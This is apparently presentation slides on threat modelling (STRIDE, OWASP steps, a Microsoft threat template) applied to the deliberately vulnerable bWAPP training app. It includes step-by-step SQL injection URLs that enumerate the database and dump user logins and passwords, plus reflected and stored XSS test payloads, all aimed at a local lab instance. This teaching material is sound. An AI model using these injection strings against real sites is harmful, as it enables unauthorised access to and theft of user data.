Threat Model For bWAPP

By Dr. Anil Nandgaonkar

Mr.Jayesh Shinde
What is a Threat?

Threat Asset under attack

 An agent
component

Attack vector
What is a Threat Model

 Depiction of:
 The system’s attack surface
 Threats who can attack the system
 Assets threats may compromise

 Some leverage risk management practices

 Estimate probability of attack
 Weight impact of successful attack
Who Benefits Threat Modelling

Threat modelling provides different benefits to the project

stakeholders depending on their role and responsibility:
• Architects
• Developers
• Security Testers
• Project Managers
• Business Managers
• Information Risk Officers
OWASP Threat Risk Modeling
Step 1: Identify Security Objectives
 Tactical Security Assessments
 Identification of Security Flaws, the Threats that can exploit them and
the mitigations
 Secure Architecture Reviews
 Requirements, Decomposition, Threat Mapping, Threat Response &
Mitigations
 Threats and Countermeasures, Risk Mitigation Strategy
 Application Risk Management
 Technical Risk and Business Risk
 Risk Mitigation Strategy
 Mitigate, Transfer, Accept it
Step 2: Application Overview
Step 3: Decompose the Application

 Objective: understand the application and how it interacts with external

entities.
 Create Use Cases
 Identify Entry Points
 Identify Assets
 Outcome: Data flow diagrams (DFD) for the application show the different
paths through the system highlighting the privilege boundaries.
Understanding the Application: Data Flow
Diagrams
STRIDE

S Spoofing
Can an attacker gain access using a false identity?

T Tampering
Can an attacker modify data as it flows through the application?

R Repudiation
If an attacker denies doing something, can we prove he did it?

I Information disclosure
Can an attacker gain access to private or potentially injurious data?

D Denial of service
Can an attacker crash or reduce the availiability of the system?

E Elevation of privilege
Can an attacker assume the identity of a privileged user?
bWAPP (buggy Web Application)

 bWAPP (buggy Web Application)

 bWAPP, or a buggy web application, is a free and open source deliberately
insecure web application.
 It helps security enthusiasts, developers and students to discover and to
prevent web vulnerabilities.
 bWAPP prepares one to conduct successful penetration testing and ethical
hacking projects
 This application has more than 70 vulnerabilities, for example, SQL infusion,
Cross-Site Scripting (XSS) or Denial of Service (DoS).
 bWAPP is a PHP application that uses a MySQL database.
 It can be facilitated on Linux, Windows and Mac with Apache/IIS and MySQL. It
can likewise be introduced with WAMP or XAMPP.
Microsoft Threat Reporting Template

Fields Description

ID Unique ID # of the threat


Name Brief name of the asset threat
Description Detailed description of threat and its importance.
STRIDE How can we classify this threat?
Mitigated Is the application safe from this threat?
Known Mitigation How can we protect against the threat?
Investigation Notes What do we know about this threat so far?
Entry Points What possible means does an adversary have?
Assets What assets could be damaged?
Threat Tree How can we visualize the threat? (Optional)
Threat Description SQL Injection
ID 1
Name Search Movies
Description An adversary tries to inject SQL command
through a request into the application to
circumvent the search process.

STRIDE Classification Information Disclosure

Mitigated no
Known Mitigation
Investigation Notes The database calls to in the application
were reviewed and string concatenation
was used on the search query.

Entry Points 1.1 Search Page

Assets 1.2 Access the backend databases
Threat Tree Yes
Threat Trees
Availability of Info.

Obtain Movies
information by
search query

AND
Information Disclosure Information Disclosure

Attacker uses Attacker uses

SQL Injection SQL Injection
Technique by Technique by
Get Method POSTMethod
1) More Search Query
http://localhost/bWAPP/bWAPP/sqli_1.php?titl
e=1' order by 1-- -
http://localhost/bWAPP/bWAPP/sqli_1.php?title=1'
order by 8-- -
More search on the column

 http://localhost/bWAPP/bWAPP/sqli_1.php?title=1' union select 1,2,3,4,5,6,--

-
Get the number of Column
Retrieve the name of the Database bWAPP
 http://localhost/bWAPP/bW
APP/sqli_1.php?title=1'
union select
1,2,3,4,database(),6,7-- -
Retrive the Version of the MySql
Database

http://localhost/bWAPP/bW
APP/sqli_1.php?title=1'
union select
1,2,3,4,version(),6,7-- -
Retrieving the Tables Name from the
bWAPP Database
‘and 1 = 0 union all select
1,table_schema,table_na
me,4,5,6,7 from
information_schema.table
s where 1=0 or 1=1-- '
Retrieving the Tables Name from the bWAPP
Database and Columns Name from Users table

'and 1=0 union all select

1,table_name,
column_name,4,5,6,7 from
information_schema.columns
where table_schema != 'mysql'
and table_schema !=
'information_schema' and
table_schema='bWAPP' and
table_name='users' -- -
m' union all
select
1,login,pass
word,secret,
5,6,7 from
users -- -
https://hashkiller.co.uk/sha1-
decrypter.aspx
Cross-Site Scripting (XSS)
 Cross-Site Scripting, or XSS, occurs when an
attacker injects a browser script into a web
application
 Insufficient validation of user-supplied data
 Dangerous when it is stored permanently!
 XSS can lead to
 Website defacements
 Phishing / session hijacking
 Client-side exploitation.
Cross-Site Scripting (XSS)

 Types of XSS flaws

 Reflected XSS
 Stored XSS
Cross-Site Scripting (XSS),
ID
ID 2
Name Login Page
Description An adversary tries to inject malicious
JavaScript into login page to successful
login
STRIDE Tampering with data
Information Disclosure
Mitigated HTML Encoding
Script Filtering
Known Mitigation
Investigation Notes The page allows entry of JavaScript code
that will then be executed when the user
try to login in the page.
Entry Points Insert the Script tag in HTML Code
Assets Web Page
Threat Trees
Integrity breaches

Modifying the
Code in Web
application

AND
Tampering with data Tampering with data
Information Disclosure Information Disclosure

Attacker uses Attacker uses

Malicious JavaScript Malicious JavaScript
Code in login page by Code in login page by
using XSS Reflected using XSS stored
Method Method
Cross Site Scripting in bWAPP
XSS –Refelected (Get)
 <a
href="javascript:alert('xss')">Cli
ck ME</a>
 Try to inject above javascript
tag alert in the HTML for
Tampering the Code.
 Clicking Click Me link, the
alert message is popped on the
Screen
XSS –Reflected (Get)
 HTML Source code view ->
div id="main">
<h1>XSS - Reflected (GET)</h1>
alteration of the HTML Code .
<p>Enter your first and last name:</p>  Tampering the source to
<form action="/bWAPP/bWAPP/xss_get.php" breach the integrity of the
method="GET"> web application
<p><label for="firstname">First name:</label><br />
<input type="text" id="firstname" name="firstname"></p>
<p><label for="lastname">Last name:</label><br
/><input type="text" id="lastname"
name="lastname"></p>
<button type="submit" name="form"
value="submit">Go</button>
</form> <br />
Welcome <a href="javascript:alert('xss')">Click ME</a>
<a href="javascript:alert('xss')">Click ME</a>
</div>
XSS Stored (blog)
 Stored XSS (or Persistent XSS) is the
most dangerous type of XSS. The
attacker injects a script (payload) that
is permanently stored (persisted) on the
vulnerable site.
 The malicious code is executed every
time a browser visits an “infected”
page, so with only one attack, the
attacker can exploit many users.
 The malicious script is inserted in a
comment field on a blog or in a forum
post.
  if you try to login in and visit this
page from another browser, you’ll
XSS Stored (blog) see that the alert box will appear,
this is because our payload is saved
into the database.

CHECK IF IT IS VULNERABLE
 To test if the input field is
vulnerable, we try to inject this
script:
<script>alert('XSS')</script>
Summary

 Without threat modelling, protecting yourself is like

“shooting in the dark”
 You need expertise in understanding most common attacks
– read security bulletins
 Developers must learn and use secure coding practices
 Assume you are vulnerable, prove you are not